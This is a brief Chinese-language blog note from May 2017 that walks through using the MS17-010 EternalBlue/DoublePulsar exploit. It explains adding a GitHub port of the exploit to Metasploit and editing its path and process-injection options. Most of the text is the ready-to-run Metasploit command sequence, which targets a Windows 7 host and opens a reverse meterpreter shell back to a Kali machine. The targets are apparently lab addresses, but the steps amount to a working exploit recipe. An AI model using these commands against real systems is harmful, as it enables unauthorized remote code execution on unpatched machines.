MS17-010

本来不做记录,后爆发全球规模蠕虫

环境

python 2.6.6
wine32
靶机win7有360 ip 192.168.1.123
kali ip 192.168.1.120

msf配置

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/

after 相应的文件copy到/usr/share/metasploit-framework/modules/exploits/windows/smb/ 我把文件更名为ms17-010 修改.rb文件为相应路径

OptString.new(‘ETERNALBLUEPATH’,[true,’Path directory of Eternalblue’,’/usr/share/metasploit-framework/modules/exploits/windows/smb/deps/’]), OptString.new(‘DOUBLEPULSARPATH’,[true,’Path directory of Doublepulsar’,’/usr/share/metasploit-framework/modules/exploits/windows/smb/deps/’]),

OptString.new(‘PROCESSINJECT’,[true,’Name of process to inject into (Change to lsass.exe for x64)’,’wlms.exe’])

这一句’wlms.exe’有人修改为’explorer’,我在测试时会不稳定断开连接

msf利用


use exploit/windows/smb/ms17-010
set PAYLOAD windows/x64/meterpreter/reverse_tcp  
set rhost 192.168.1.123  
set lhost 192.168.1.120  
show option  
exploit  

内网穿透

浮萍链接

Written on May 14, 2017